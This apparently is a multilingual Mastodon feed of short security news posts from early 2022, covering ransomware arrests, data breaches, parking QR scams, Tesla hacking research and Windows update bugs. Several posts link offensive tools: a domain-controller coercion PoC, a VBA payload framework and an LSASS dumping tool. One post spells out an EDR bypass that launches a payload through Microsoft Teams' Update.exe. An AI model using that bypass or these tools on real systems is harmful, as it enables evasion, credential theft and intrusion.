yaracroft @venom@nanao.cybtex.fr

🇺🇦 Кіберполіція викрила хакерське угруповання на атаках іноземних компаній вірусом-шифрувальником #ukraine #police #ransomware #informatique

http://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-na-atakax-inozemnyx-kompanij-virusom-shyfruvalnykom-4133/

🇺🇦 СБУ викрила українців, які створили сервіс для хакерів і обікрали 50 іноземних компаній на мільйон доларів #ukraine #police #ransomware #informatique

https://ssu.gov.ua/novyny/sbu-vykryla-ukraintsiv-yaki-stvoryly-servis-dlia-khakeriv-i-obikraly-50-inozemnykh-kompanii-na-milion-dolariv

Scammers in a few big Texas cities have been putting fake QR codes on parking meters to trick people into paying the fraudsters. #usa #fraud #qr #parking #city #threats #informatique

https://arstechnica.com/tech-policy/2022/01/scammers-put-fake-qr-codes-on-parking-meters-to-intercept-parkers-payments/

Am 4. Januar 2022 wurde die Unfallkasse Thüringen (ukt.de) Opfer eines Cyberangriffes. Den Angreifern ist es gelungen über eine Ransomeware alle Server zu verschlüsseln.

https://www.ukt.de/unser-service/aktuelles/news/news-detail?tx_news_pi1%5Baction%5D=detail&tx_news_pi1%5Bcontroller%5D=News&tx_news_pi1%5Bnews%5D=491&cHash=086e9edfb2edcdc0ba1a3cc35e1e2453

Imagine a future where moral and cognitive battles are waged with well-crafted narratives delivered and manipulated by an intricate web of simple and sophisticated cyber, information, electronic, and psychological warfare tools. #cyber #military #threats #informatique

https://mwi.usma.edu/rethinking-man-train-and-equip-for-information-advantage/

ShadowCoerce - Coercing the domain controller machine account to authenticate to a host which is under the control of a threat actor could lead to domain compromise. #microsoft #windows #cyber #threats #informatique

https://pentestlaboratories.com/2022/01/11/shadowcoerce/

ShadowCoerce - Domain controllers which are running the VSS Agent Service could provide an opportunity for domain escalation. #microsoft #windows #cyber #threats #informatique

https://youtube.com/watch?v=8ChZDeizjII

ShadowCoerce - MS-FSRVP coercion abuse PoC #python #tools #informatique

https://github.com/ShutdownRepo/ShadowCoerce

Un jeune allemand de 19 ans, David Colombo, spécialiste en sécurité informatique a discrètement piraté plusieurs Tesla situées à l'autre bout du monde. Résultat, il pouvait réaliser à distance tout un tas d'actions plus impressionnantes les unes que les autres. #allemagne #hackers #vuln #tesla #automotive #cyber #threats #informatique

https://iphonesoft.fr/2022/01/12/hackeur-allemand-prendre-controle-25-tesla-distance

A teenage security researcher, David Colombo, claimed that he can remotely control various functions in 25 Teslas across 13 countries. Tesla #germany #hackers #vuln #tesla #automotive #cyber #threats #informatique

https://www.nasdaq.com/articles/teenage-researcher-claims-control-over-25-teslas

Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory #tools #informatique

https://github.com/optiv/Ivy

How to bypass EDR with Microsoft Teams ?

• Copy payload into: %userprofile%\AppData\Local\Microsoft\Teams\current\

• Then: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args"

Credit: Elli (IR)
#microsoft #teams #windows #informatique

ParseFortinetSerialNumber - A #Python #script to parse #Fortinet products serial numbers, and detect the associated model and version. #windows #tools #informatique

https://github.com/p0dalirius/ParseFortinetSerialNumber

MirrorDump - Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory. #windows #tools #informatique

https://github.com/snovvcrash/MirrorDump

[PDF] A comprehensive set of reverse engineering tutorials covers x86, x64 as well as 32-bit ARM and 64-bit architectures. #informatique

https://0xinfection.github.io/reversing/reversing-for-everyone.pdf

🇺🇸 The health information management services provider CIOX Health (cioxhealth.com) has suffered a data breach that has affected at least 32 healthcare providers. CIOX health started notifying affected healthcare provider clients about the breach on December 30, 2021. The security breach has been reported to the HHS' Office for Civil Rights by CIOX Health as affecting 12,493 individuals. #usa #healthcare #medical #services #cyber #threats #databreach #santé #informatique

https://www.hipaajournal.com/over-30-healthcare-providers-affected-by-ciox-health-data-breach/

🇦🇷 Ataque informático contra algunos servidores del Poder Judicial del Chaco (justiciachaco.gov.ar) #argentina #ransomware #city #distruptive #cyber #threats #outage #databreach #argentine #informatique

http://e-procesal.com/wp-content/uploads/2022/01/Comunicado-Urgente.pdf

New Windows Server updates cause DC boot loops, break Hyper-V. The most serious issue introduced by these #updates is that Windows Domain Controllers enter a boot loop, with servers getting into an endless cycle of #Windows starting and then rebooting after a few minutes. After installing Microsoft Updates, #Windows Resilient File System (ReFS) volumes are no longer accessible or are seen as RAW (unformatted) after installing the updates. In addition to the boot loops, Hyper-V no longer starts on the server. Microsoft released security updates to fix four different Hyper-V vulnerabilities yesterday (CVE-2022-21901, CVE-2022-21900, CVE-2022-21905, and CVE-2022-21847), which are likely causing this issue. #vuln #microsoft #windows #bugs #informatique

https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/

🇬🇧 Plus de 50 000 courriers envoyés par des banques et des collectivités locales indexées par Google suite à une erreur de la société de sous-traitance Virtual Mail Room (vmailroom.co.uk) #uk #databreach #informatique

https://www.wired.co.uk/article/virtual-mail-room-data-breach